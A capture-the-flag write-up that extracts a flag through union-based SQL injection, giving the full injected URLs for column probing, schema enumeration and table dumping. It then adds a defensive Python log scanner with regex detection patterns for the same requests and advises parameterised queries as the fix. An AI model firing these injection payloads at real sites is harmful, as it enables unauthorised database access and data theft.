Click the left side of the page and capture the request in Burp; you can see the query:
/query?search=arabia_terra/**/ORDER/**/BY/**/2
Initial judgement: the column count is 2. When editing the URL in Burp, it is best to encode spaces as %20 or to use /**/ in their place.
Next, use the following statement to find that the current database is aliens:
/query?search=arabia_terra%20union%20select%201,database()
/query?search=arabia_terra%20union%20select%201,group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database()
Dump the tables in this database: amazonis_planitia, arabia_terra, chryse_planitia, hellas_basin, hesperia_planum, noachis_terra, olympus_mons, tharsis_rise, utopia_basin
These are just the entries from the page's directory, so they don't seem to be of any use.
/query?search=arabia_terra%20union%20select%201,group_concat(schema_name)%20from%20information_schema.schemata
Three databases come out: information_schema, alien_code, aliens; the most likely one is alien_code.
/query?search=arabia_terra%20union%20select%201,group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema="alien_code"
There is only one table: code
/query?search=arabia_terra%20union%20select%201,group_concat(column_name)%20from%20information_schema.columns%20where%20table_name="code"
Two columns: id, code
/query?search=arabia_terra%20union%20select%201,group_concat(id,code)%20from%20alien_code.code
This gives the flag.
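From the defender's side, the detail in this writeup worth remembering is that the injected requests use two different space substitutes (%20 and /**/), so a detector that matches the raw request line for "union select" or "order by" will miss half of them. The following is an added example, not part of the writeup or of the challenge's code: a small Python scanner that percent-decodes the request path, collapses inline comments to spaces, and then tags the access-log entries that carry the union/ORDER BY/information_schema patterns seen above. The log lines are constructed for this example and mirror the writeup's URLs.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (not taken from any real server);
# entries 1-3 reproduce the request shapes from the writeup, the rest are benign.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /query?search=olympus_mons HTTP/1.1" 200 512',
    '10.0.0.5 - - [01/Jan/2024:10:00:07 +0000] "GET /query?search=arabia_terra/**/ORDER/**/BY/**/2 HTTP/1.1" 200 640',
    '10.0.0.5 - - [01/Jan/2024:10:00:15 +0000] "GET /query?search=arabia_terra%20union%20select%201,database() HTTP/1.1" 200 660',
    '10.0.0.5 - - [01/Jan/2024:10:00:31 +0000] "GET /query?search=arabia_terra%20union%20select%201,group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database() HTTP/1.1" 200 900',
    '10.0.0.9 - - [01/Jan/2024:10:01:02 +0000] "GET /query?search=hellas_basin HTTP/1.1" 200 480',
]

# Matches the request target inside the quoted request line of a common-log-format entry.
REQUEST_RE = re.compile(r'"(?:GET|POST|PUT|DELETE|HEAD) (\S+) HTTP/')

# Signatures are applied to the *normalized* path, never to the raw one.
PATTERNS = {
    "union_select": re.compile(r"\bunion\b\s+(?:all\s+)?select\b"),
    "order_by_probe": re.compile(r"\border\s+by\s+\d+\b"),
    "schema_enum": re.compile(r"\binformation_schema\.(?:tables|columns|schemata)\b"),
}


def normalize(raw: str) -> str:
    """Percent-decode (repeatedly, to catch double encoding), turn /*...*/ comments
    into a single space, collapse whitespace and lowercase the result."""
    s = raw
    for _ in range(3):
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    s = re.sub(r"/\*.*?\*/", " ", s)   # /**/ is the space substitute used in the writeup
    s = re.sub(r"\s+", " ", s)
    return s.lower()


def classify(path: str) -> list:
    """Return the list of signature names that fire on one request path."""
    norm = normalize(path)
    return [name for name, rx in PATTERNS.items() if rx.search(norm)]


def scan_log(lines: list) -> list:
    """Scan log lines and return one finding per suspicious entry:
    {'line': index, 'path': raw request target, 'tags': [signature names]}."""
    findings = []
    for idx, line in enumerate(lines):
        m = REQUEST_RE.search(line)
        if not m:
            continue  # unparsable line; a real deployment would count these
        tags = classify(m.group(1))
        if tags:
            findings.append({"line": idx, "path": m.group(1), "tags": tags})
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"line {f['line']}: {', '.join(f['tags'])}  <- {f['path']}")
```

The ORDER BY probe with /**/ separators is only caught because normalization runs before matching; the same applies to the %20-encoded union requests. For an application like the one in the writeup, the fix on the code side is to pass the search term as a bound parameter instead of concatenating it into the statement, which makes these requests harmless regardless of how the spaces are written; the scanner above is for spotting the probing in logs, not a substitute for that fix.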